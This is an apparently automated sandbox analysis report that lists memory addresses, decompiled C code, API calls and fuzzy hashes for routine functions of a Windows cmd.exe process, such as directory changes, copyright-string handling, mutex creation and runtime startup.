0x00d9c05b
0x00000000
0x00d9c061
0x00d9c06d
0x00d8eb5a
0x00d8eb5a
0x00d8eb66
0x00d8eb7e
0x00d8eb81
0x00d8eb84
0x00d8eb8b
0x00d8ecf0
0x00d8ecf0
0x00d8ecf4
0x00d8ecf6
0x00d8ecf9
0x00d8ecfc
0x00d8ecff
0x00d8ed05
0x00000000
0x00000000
0x00d8ed0a
0x00000000
0x00d8ed10
0x00d8ed15
0x00000000
0x00d8ed17
0x00000000
0x00d8ed17
0x00d8ed15
0x00000000
0x00d8ed0a
0x00d8ed6e
0x00d8ed6e
0x00d8eb91
0x00d8eb91
0x00d8eb68
0x00d8eb6d
0x00d8eb73
0x00d8eb78
0x00d8eccd
0x00d8ecd2
0x00d8ed23
0x00d8ed26
0x00d8ed69
0x00d8ed69
0x00d8ed28
0x00d8ed2e
0x00d8ed38
0x00d8ecd4
0x00d8ecd6
0x00d9c092
0x00d9c092
0x00d8ecdc
0x00d8ece6
0x00d8ece6
0x00000000
0x00000000
0x00000000
0x00d8eb78
0x00d8eb9b
0x00d8eb9f
0x00d8eba2
0x00d8eba7
0x00000000
0x00000000
0x00d9c073
0x00d8ec20
0x00d8ec20
0x00d8ec26
0x00d8ec28
0x00d8ec30
0x00d8ec37
0x00d8ec3d
0x00d8ec42
0x00d8ec8a
0x00d8ec91
0x00d8eca9
0x00d8ecb0
0x00d9c084
0x00000000
0x00d9c08a
0x00000000
0x00d9c08a
0x00d8ecb6
0x00d8ecb6
0x00d8ecb6
0x00d8ecba
0x00d8ecbd
0x00d8ecc2
0x00000000
0x00000000
0x00d8ecc8
0x00d8ecc2
0x00d8ec97
0x00d8ec9c
0x00d8eca2
0x00d8eca7
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8eca7
0x00d8ec44
0x00d8ec4f
0x00d8ec55
0x00d8ec5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ec5a
0x00000000
0x00d8ec42
0x00d8ec60
0x00d8ec6d
0x00d8ec78
0x00d8ec78
0x00d8ec7b
0x00d8ec85
0x00d8eb5a
0x00d8eb5a
0x00d8eb5a
0x00d8eb5a
0x00000000
0x00d8eb26
0x00d8eb26
0x00d8eb2d
0x00d8eb33
0x00d8eb38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8eb3e
0x00d8eb49
0x00d8eb4f
0x00d8eb52
0x00d8ebde
0x00d8ebe3
0x00000000
0x00d8ebe9
0x00d8ebe9
0x00d8ebe9
0x00d8ebec
0x00d8ebf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ebf2
0x00000000
0x00d8ed40
0x00d8ed40
0x00000000
0x00d8ebf8
0x00d8ebfd
0x00d8ec03
0x00d8ec06
0x00d8ec0e
0x00d8ec11
0x00d8ec14
0x00d8ec1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ec1a
0x00d8ec60
0x00d8ec26
0x00d8ebad
0x00d8ebad
0x00d8ebb5
0x00d8ebb7
0x00d8ebc5
0x00d9c09a
0x00d9c0a6
0x00d9c0ac
0x00d9c0ad
0x00d9c0ad
0x00d9c0ad
0x00d9c0b0
0x00d9c0b0
0x00d9c0b3
0x00d9c0b6
0x00d9c0bf
0x00d8edfa
0x00d8edfa
0x00d8edfa
0x00d8ee02
0x00d8ee04
0x00d8ee09
0x00000000
0x00000000
0x00d8ee0f
0x00d8ee14
0x00d9c0cb
0x00d9c0cb
0x00d8ee1a
0x00d8ee1e
0x00d9c0d5
0x00d9c0d5
0x00d8ee32
0x00d9c0f0
0x00d9c0f0
0x00d8ee38
0x00d8ee38
0x00d8ee3a
0x00d8ee3c
0x00d8ee40
0x00d9c0eb
0x00d9c0eb
0x00000000
0x00d8ee46
0x00d8ee46
0x00d9c0df
0x00d9c0e2
0x00d9c0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9c0e5
0x00d8ee51
0x00000000
0x00d8ee57
0x00d8ee59
0x00d8ee59
0x00d8ee51
0x00d8ee40
0x00d8ee5b
0x00d8ee5d
0x00d8ee64
0x00d8ee67
0x00d8ee69
0x00d8ee99
0x00d8ee99
0x00d8ee6b
0x00d8ee7a
0x00d8ee7c
0x00d8ee80
0x00d8ee84
0x00d8ee8b
0x00000000
0x00d8ee8d
0x00d8ee8d
0x00d8ee90
0x00d8ee91
0x00d8ee94
0x00d8ee97
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ee97
0x00000000
0x00d8ee8b
0x00d8eea0
0x00000000
0x00000000
0x00d8eea0
0x00d8eea2
0x00d8eea2
0x00d8eea7
0x00d8eea7
0x00d8eeaa
0x00d8eda4
0x00d8edbc
0x00d8ede9
0x00d8edec
0x00d8edf4
0x00000000
0x00000000
0x00000000
0x00d8edbe
0x00d8edbe
0x00d8edca
0x00d8eeb2
0x00d8eeb4
0x00d8eeb4
0x00d8eeb4
0x00d8eeb7
0x00d8eeb9
0x00d8eebc
0x00d8eec0
0x00000000
0x00d8edd0
0x00d8edd5
0x00000000
0x00d8edd5
0x00d8edca
0x00000000
0x00d8edbc
0x00d8edde
0x00d8ede8
0x00000000
0x00d8ede8
0x00d9c0f7
0x00d9c103
0x00d9c109
0x00d9c111
0x00d9c117
0x00d9c117
0x00d8efea
0x00d8efef
0x00d9c125
0x00d9c125
0x00d8eff5
0x00d8effb
0x00000000
0x00d8effb
0x00d8ebcb
0x00d8ebce
0x00d8ebcf
0x00d8ebd2
0x00d8ebdb
0x00d8ebdb
0x00000000
0x00d8ebc5
0x00d8e9d9
0x00d8e9d9
0x00d8e9df
0x00d8e9e4
0x00d8e9ec
0x00d8ea31
0x00000000
0x00d8ea33
0x00d8e9ee
0x00d8e9f8
0x00d8e9fa
0x00d8ea00
0x00d8ea07
0x00d8ea0e
0x00000000
0x00d8ea10
0x00d8ea10
0x00d8ea13
0x00d8ea16
0x00d8ea19
0x00000000
0x00d8ea1b
0x00d8ea1b
0x00d8ea1b
0x00d8ea1b
0x00d8ea19
0x00d8ea24
0x00d8ea26
0x00000000
0x00d8ea26
0x00d8ea22
0x00000000
0x00000000
0x00000000
0x00d8ea22
0x00d8e9ec
0x00d8ea29
0x00d8ea2e
0x00d8ea2e
0x00d8e9d3
0x00000000

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

wcschr.MSVCRT ref: 00D8EB6D
iswspace.MSVCRT ref: 00D8EC37
wcschr.MSVCRT ref: 00D8EC4F
longjmp.MSVCRT(00DBB8B8,00000001,?,00000000,?,00D8ED9F,?,00000000,?), ref: 00D9C024
longjmp.MSVCRT(00DBB8B8,00000001), ref: 00D9C036
longjmp.MSVCRT(00DBB8B8,00000001,00000000,?,?), ref: 00D9C049
longjmp.MSVCRT(00DBB8B8,00000001), ref: 00D9C05B

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: longjmp$Heapwcschr$AllocProcessiswspace
String ID:
API String ID: 2511250921-0
Opcode ID: 640d076b226fd860f8a42aca4fb07845c23a09013dbc880119f215579e2dd133
Instruction ID: 29941a4721d86b201b89f7757f10dcdbcf5c8aa25a1cc8c2550444278a2734a7
Opcode Fuzzy Hash: 640d076b226fd860f8a42aca4fb07845c23a09013dbc880119f215579e2dd133
Instruction Fuzzy Hash: 8D41E471600212CADF346F68DC557BA73A9EF80701F18456AE846A7281EB719C44CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA93E2, Relevance: 10.6, APIs: 7, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00DA93E2(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				int _v36;
				char _v40;
				signed int _v44;
				void _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				short _t51;
				short _t53;
				void* _t58;
				void* _t59;
				WCHAR* _t61;
				int _t62;
				short* _t75;
				void* _t76;
				short _t77;
				int _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				WCHAR* _t91;
				signed int _t96;

				_t83 = __edx;
				_t68 = _t96;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t96 + 4));
				_t94 = (_t96 & 0xfffffff8) + 4;
				_t39 =  *0xdad0b4; // 0x35c4fbb8
				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
				_v40 = 1;
				_t86 = 0;
				_v36 = 0x104;
				_v44 = _v44 & 0;
				_t89 = __ecx;
				memset( &_v564, 0, 0x104);
				if(E00D90C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L23:
					__imp__??_V@YAXPAX@Z(_v44);
					_pop(_t87);
					_pop(_t90);
					return E00D96FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
				}
				_t51 = 0x3d;
				_v24 = _t51;
				_v22 = _t89 + 0x40;
				_t53 = 0x3a;
				_v20 = _t53;
				_v18 = 0;
				_t91 = E00D8CFBC( &_v24);
				if(_t91 == 0) {
					L4:
					_t75 = _v44;
					if(_t75 == 0) {
						_t75 =  &_v564;
					}
					 *_t75 = _v22;
					_t76 = _v44;
					if(_t76 == 0) {
						_t76 =  &_v564;
					}
					 *((short*)(_t76 + 2)) = _v20;
					_t58 = _v44;
					if(_t58 == 0) {
						_t58 =  &_v564;
					}
					_t77 = 0x5c;
					 *((short*)(_t58 + 4)) = _t77;
					_t59 = _v44;
					if(_t59 == 0) {
						_t59 =  &_v564;
					}
					 *((short*)(_t59 + 6)) = 0;
					_t84 = _v44;
					if(_v44 == 0) {
						_t84 =  &_v564;
					}
					_t79 =  &_v24;
					E00D93A50( &_v24, _t84);
					_t61 = _v44;
					if(_t61 == 0) {
						_t61 =  &_v564;
					}
					_t62 = SetCurrentDirectoryW(_t61);
					if(_t62 == 0) {
						_push(_t62);
						_push(GetLastError());
						E00D8C5A2(_t79);
					}
					if(_t91 != 0) {
						SetErrorMode(_t86);
					}
					L20:
					_t80 =  *0xdc3cb8;
					if( *0xdc3cb8 == 0) {
						_t80 = 0xdc3ab0;
					}
					_t83 =  *0xdc3cc0;
					_t49 = E00D936CB(_t68, _t80,  *0xdc3cc0, 0);
					goto L23;
				}
				if(SetCurrentDirectoryW(_t91) != 0) {
					goto L20;
				}
				_t86 = SetErrorMode(1);
				goto L4;
			}

0x00da93e2
0x00da93e5
0x00da93e7
0x00da93e8
0x00da93f3
0x00da93f7
0x00da93ff
0x00da9406
0x00da9410
0x00da9415
0x00da9417
0x00da941a
0x00da9425
0x00da9427
0x00da9450
0x00da954b
0x00da954e
0x00da9558
0x00da955b
0x00da9567
0x00da9567
0x00da9458
0x00da9459
0x00da9463
0x00da9469
0x00da946a
0x00da9470
0x00da9479
0x00da947d
0x00da9498
0x00da9498
0x00da949d
0x00da949f
0x00da949f
0x00da94a9
0x00da94ac
0x00da94b1
0x00da94b3
0x00da94b3
0x00da94bd
0x00da94c1
0x00da94c6
0x00da94c8
0x00da94c8
0x00da94d0
0x00da94d1
0x00da94d5
0x00da94da
0x00da94dc
0x00da94dc
0x00da94e4
0x00da94e8
0x00da94ed
0x00da94ef
0x00da94ef
0x00da94f5
0x00da94f8
0x00da94fd
0x00da9502
0x00da9504
0x00da9504
0x00da950b
0x00da9513
0x00da9515
0x00da951c
0x00da951d
0x00da9523
0x00da9526
0x00da9529
0x00da9529
0x00da952f
0x00da952f
0x00da9537
0x00da9539
0x00da9539
0x00da953e
0x00da9546
0x00000000
0x00da9546
0x00da9488
0x00000000
0x00000000
0x00da9496
0x00000000

APIs

memset.MSVCRT ref: 00DA9427

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

??_V@YAXPAX@Z.MSVCRT ref: 00DA954E

Part of subcall function 00D8CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DAF830,00002000,?,?,?,?,?,00D9373A,00D8590A,00000000), ref: 00D8CFDF

SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00DA9480
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00DA9490
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00DA950B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00DA9516
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00DA9529

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
String ID:
API String ID: 920682188-0
Opcode ID: aa63598cd9226158e5854e7220216f88af9be85649606ba8b0d574ac27247b5b
Instruction ID: cce6ff40403127e0fc7c9c3b4984cce0f4c04d5217789bd347b1f1ee56d2eaa2
Opcode Fuzzy Hash: aa63598cd9226158e5854e7220216f88af9be85649606ba8b0d574ac27247b5b
Instruction Fuzzy Hash: E441CE31A0031AABDF14DFA4EC55AEEB3B4EF49314F048199E809E7250EB38DA41CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6456, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00DA6456(void* __eflags) {
				signed int _v8;
				char _v68;
				void* _v72;
				signed int _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				void _t31;
				signed int _t36;
				void* _t38;
				short _t39;
				short _t40;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				void* _t53;
				signed int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t65;
				void* _t66;
				signed int _t70;

				_t21 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t21 ^ _t70;
				_t49 = 0xe;
				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
				asm("movsw");
				_t65 = 0;
				_t47 = 0;
				if(E00D97735(0) == 0) {
					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
						goto L26;
					} else {
						_t67 = _v80;
						_v72 = _t67;
						goto L4;
					}
				} else {
					_t46 =  *0xdcc000(L"%WINDOWS_COPYRIGHT%");
					_t67 = _t46;
					_v72 = _t46;
					L4:
					if(_t67 == 0) {
						L26:
						_t28 = 0;
					} else {
						_t30 =  *_t67 & 0x0000ffff;
						_t60 = _t67;
						if(_t30 != 0) {
							_t58 = _t30;
							do {
								if(_t58 == 0xae || _t58 == 0xa9) {
									_t43 = 1;
								} else {
									_t43 = _t65;
								}
								_t60 = _t60 + 2;
								_t47 = _t47 + _t43;
								_t44 =  *_t60 & 0x0000ffff;
								_t58 = _t44;
							} while (_t44 != 0);
							_t67 = _v72;
						}
						_t53 = _t67;
						_t59 = _t53 + 2;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t31 != _t65);
						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
						_v76 = _t47;
						if(_t47 != 0) {
							_t36 =  *_t67 & 0x0000ffff;
							_t66 = _t67;
							_t56 = _t47;
							if(_t36 != 0) {
								_t61 = _t36;
								do {
									if(_t61 == 0xae || _t61 == 0xa9) {
										_t38 = 0x28;
										 *_t56 = _t38;
										_t39 = 0x63;
										 *((short*)(_t56 + 2)) = _t39;
										_t57 = _t56 + 4;
										_t40 = 0x29;
										 *_t57 = _t40;
									} else {
										 *_t56 = _t61;
									}
									_t66 = _t66 + 2;
									_t56 = _t57 + 2;
									_t41 =  *_t66 & 0x0000ffff;
									_t61 = _t41;
								} while (_t41 != 0);
								_t67 = _v72;
								_t47 = _v76;
							}
							_t65 = _t47;
							 *_t56 = 0;
						}
						GlobalFree(_t67);
						_t28 = _t65;
					}
				}
				return E00D96FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
			}

0x00da645e
0x00da6465
0x00da646d
0x00da646e
0x00da6476
0x00da6478
0x00da647a
0x00da647c
0x00da6485
0x00da64a9
0x00000000
0x00da64af
0x00da64af
0x00da64b2
0x00000000
0x00da64b2
0x00da6487
0x00da648c
0x00da6492
0x00da6494
0x00da64b5
0x00da64b7
0x00da6589
0x00da6589
0x00da64bd
0x00da64bd
0x00da64c0
0x00da64c5
0x00da64c7
0x00da64ce
0x00da64d1
0x00da64e3
0x00da64dd
0x00da64dd
0x00da64dd
0x00da64e4
0x00da64e7
0x00da64e9
0x00da64ec
0x00da64ee
0x00da64f3
0x00da64f3
0x00da64f6
0x00da64f8
0x00da64fb
0x00da64fb
0x00da64fe
0x00da6501
0x00da651d
0x00da651f
0x00da6524
0x00da6526
0x00da6529
0x00da652b
0x00da6530
0x00da6537
0x00da653c
0x00da653f
0x00da654d
0x00da654e
0x00da6553
0x00da6554
0x00da6558
0x00da655d
0x00da655e
0x00da6546
0x00da6546
0x00da6546
0x00da6561
0x00da6564
0x00da6567
0x00da656a
0x00da656c
0x00da6571
0x00da6574
0x00da6574
0x00da6579
0x00da657b
0x00da657b
0x00da657f
0x00da6585
0x00da6585
0x00da64b7
0x00da659b

APIs

RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00DA64A1
GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00DA6517
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00DA657F

Strings

%WINDOWS_COPYRIGHT%, xrefs: 00DA6487
@PWt, xrefs: 00DA6517

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Global$AllocAsciizCreateFreeFromStringUnicode
API String ID: 1103618819-2326439817
Opcode ID: bed462cf82af2b43e47f5f71425eddf039cf938daa534e1df494b11e12028826
Instruction ID: dfebb956e4325a4e21f15c58a81f25e063a2211116752a6dbc164b678b40b7a5
Opcode Fuzzy Hash: bed462cf82af2b43e47f5f71425eddf039cf938daa534e1df494b11e12028826
Instruction Fuzzy Hash: DF41D376A00316CBCB20DFA898506BA73B5EF4A710B6C0069E945EB354EAA5DD03C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA17B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00DA17B6(char* __ecx, signed int* __edx) {
				intOrPtr _v0;
				signed int _v8;
				char _v528;
				void* _v532;
				signed int _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t25;
				void* _t29;
				signed int* _t39;
				char* _t40;
				void* _t54;
				signed int _t55;
				signed int _t57;

				_t40 = __ecx;
				_t20 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t20 ^ _t57;
				_t39 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E00D9274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_t25 =  &_v528;
				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
				_t54 = _t25;
				_v532 = _t54;
				if(_t54 != 0) {
					E00DA2D6D( &_v532,  &_v540);
					_t49 =  &_v536;
					_v536 = 0;
					_t55 = 0;
					_t53 = E00DA1578( &_v528,  &_v536,  &_v532);
					if(_t53 >= 0) {
						_t55 = _v536 << 2;
						_t53 = 0;
					} else {
						_push(_t53);
						_push("wil");
						_t49 = 0x6a;
						E00DA292C();
					}
					if(_t53 >= 0) {
						if(_t55 == 0) {
							L14:
							_t49 =  &_v532;
							_t40 =  &_v528;
							_t29 = E00DA250A(_t40,  &_v532, _t53, _t39);
							_t53 = _t29;
							if(_t29 >= 0) {
								goto L9;
							} else {
								_t49 = 0x129;
								goto L16;
							}
							goto L18;
						} else {
							 *_t39 = _t55;
							_t40 =  *_t55 + 1;
							 *( *_t39) = _t40;
							L9:
							_t53 = 0;
						}
					} else {
						_t49 = 0x121;
						L16:
						_t40 = _v0;
						E00DA292C("wil", _t53);
					}
					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
						_push(_t40);
						L13:
						E00DA2D56();
						goto L14;
					}
					_t54 = _v532;
				} else {
					_t53 = E00DA1EBE(_t40);
				}
				L18:
				if(_t54 != 0 && CloseHandle(_t54) == 0) {
					_push(_t40);
					goto L13;
				}
				return E00D96FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
			}

0x00da17b6
0x00da17c1
0x00da17c8
0x00da17ce
0x00da17d5
0x00da17ef
0x00da17f7
0x00da1805
0x00da180b
0x00da180d
0x00da1815
0x00da1833
0x00da1839
0x00da183f
0x00da184b
0x00da1852
0x00da1856
0x00da1871
0x00da1874
0x00da1858
0x00da185b
0x00da185c
0x00da1863
0x00da1864
0x00da1864
0x00da1878
0x00da1883
0x00da18b7
0x00da18b8
0x00da18be
0x00da18c4
0x00da18c9
0x00da18cd
0x00000000
0x00da18cf
0x00da18cf
0x00000000
0x00da18cf
0x00000000
0x00da1885
0x00da1885
0x00da188b
0x00da188c
0x00da188e
0x00da188e
0x00da188e
0x00da187a
0x00da187a
0x00da18d4
0x00da18d4
0x00da18dd
0x00da18dd
0x00da1897
0x00da18a9
0x00da18af
0x00da18b2
0x00000000
0x00da18b2
0x00da18e4
0x00da1817
0x00da181c
0x00da181c
0x00da18ea
0x00da18ec
0x00da18f9
0x00000000
0x00da18fa
0x00da1913

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00DA17D7
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00DA1805
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 00DA189F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 00DA18EF

Strings

wil, xrefs: 00DA185C, 00DA18D8
Local\SM0:%d:%d:%hs, xrefs: 00DA17DE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Mutex$CloseCreateCurrentHandleProcessRelease
String ID: Local\SM0:%d:%d:%hs$wil
API String ID: 3048291649-2303653343
Opcode ID: 4bd342bd75700efbcbd09a251670fbdb5512b19df8880757c353fbb304a422f8
Instruction ID: e29970071282ff81e06758f43dd529ae9c74b151283468680cb6c261273d253f
Opcode Fuzzy Hash: 4bd342bd75700efbcbd09a251670fbdb5512b19df8880757c353fbb304a422f8
Instruction Fuzzy Hash: 80311976E40229ABCB25EB24CC89FEA7375EB92700F104295F809A7240DB74DE05CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00D96E03, Relevance: 10.6, APIs: 7, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00D96E03(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t10;
				intOrPtr _t14;
				intOrPtr _t20;
				intOrPtr* _t21;
				int _t34;
				intOrPtr _t36;
				int _t38;
				void* _t40;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0xdabe78);
				E00D975CC(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t40 - 4)) = 0;
				_t36 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t34 = 0;
				while(1) {
					_t20 = _t36;
					_t10 = 0;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t36) {
						Sleep(0x3e8);
						continue;
					} else {
						_t38 = 1;
						_t34 = 1;
					}
					L6:
					_t47 =  *0xdad514 - _t38; // 0x0
					if(_t47 != 0) {
						__eflags =  *0xdad514; // 0x0
						if(__eflags != 0) {
							 *0xdad19c = _t38;
							goto L12;
						} else {
							 *0xdad514 = _t38;
							_t10 = E00D96F72(_t20, 0xd81c04, 0xd81c10);
							__eflags = _t10;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L00D973C4();
						L12:
						_t48 =  *0xdad514 - _t38; // 0x0
						if(_t48 == 0) {
							_push(0xd81c00);
							_push(0xd81bd8);
							L00D975C6();
							 *0xdad514 = 2;
						}
						if(_t34 == 0) {
							_t10 =  *0xdad510;
							 *0xdad510 = 0;
						}
						_t51 =  *0xdad520;
						if( *0xdad520 != 0) {
							_t10 = E00D97420(_t51, 0xdad520);
							if(_t10 != 0) {
								_t38 =  *0xdad520; // 0x0
								 *0xdc94b4(0, 2, 0);
								_t10 =  *_t38();
							}
						}
						_push( *0xdad1a8);
						_push( *0xdad1a4);
						_push( *0xdad1a0);
						E00D944FC();
						 *0xdad198 = _t10;
						if( *0xdad1b0 != 0) {
							__eflags =  *0xdad19c;
							if( *0xdad19c == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
							L24:
							return E00D97614(0, _t34, _t38);
						} else {
							exit(_t10);
							_t21 =  *((intOrPtr*)(_t40 - 0x14));
							_t14 =  *((intOrPtr*)( *_t21));
							 *((intOrPtr*)(_t40 - 0x20)) = _t14;
							_push(_t21);
							_push(_t14);
							L00D9731E();
							return _t14;
						}
					}
				}
				_t38 = 1;
				__eflags = 1;
				goto L6;
			}

0x00d96e03
0x00d96e05
0x00d96e0a
0x00d96e11
0x00d96e1a
0x00d96e1d
0x00d96e1f
0x00d96e24
0x00d96e26
0x00d96e28
0x00d96e2e
0x00000000
0x00000000
0x00d96e32
0x00d96e40
0x00000000
0x00d96e34
0x00d96e36
0x00d96e37
0x00d96e37
0x00d96e4b
0x00d96e4b
0x00d96e51
0x00d96e5d
0x00d96e63
0x00d96e91
0x00000000
0x00d96e65
0x00d96e65
0x00d96e75
0x00d96e7c
0x00d96e7e
0x00000000
0x00d96e80
0x00d96e80
0x00000000
0x00d96e87
0x00d96e7e
0x00d96e53
0x00d96e53
0x00d96e55
0x00d96e97
0x00d96e97
0x00d96e9d
0x00d96e9f
0x00d96ea4
0x00d96ea9
0x00d96eb0
0x00d96eb0
0x00d96ebc
0x00d96ec5
0x00d96ec5
0x00d96ec5
0x00d96ec7
0x00d96ece
0x00d96ed5
0x00d96edd
0x00d96ee3
0x00d96eeb
0x00d96ef1
0x00d96ef1
0x00d96edd
0x00d96ef3
0x00d96ef9
0x00d96eff
0x00d96f05
0x00d96f0d
0x00d96f19
0x00d96f51
0x00d96f58
0x00d96f5a
0x00d96f60
0x00d96f65
0x00d96f6c
0x00d96f71
0x00d96f1b
0x00d96f1c
0x00d96f22
0x00d96f27
0x00d96f29
0x00d96f2c
0x00d96f2d
0x00d96f2e
0x00d96f35
0x00d96f35
0x00d96f19
0x00d96e51
0x00d96e4a
0x00d96e4a
0x00000000

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00DABE78,00000010), ref: 00D96E40
_amsg_exit.MSVCRT ref: 00D96E55
_initterm.MSVCRT ref: 00D96EA9
__IsNonwritableInCurrentImage.LIBCMT ref: 00D96ED5
exit.MSVCRT ref: 00D96F1C
_XcptFilter.MSVCRT ref: 00D96F2E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
String ID:
API String ID: 796493780-0
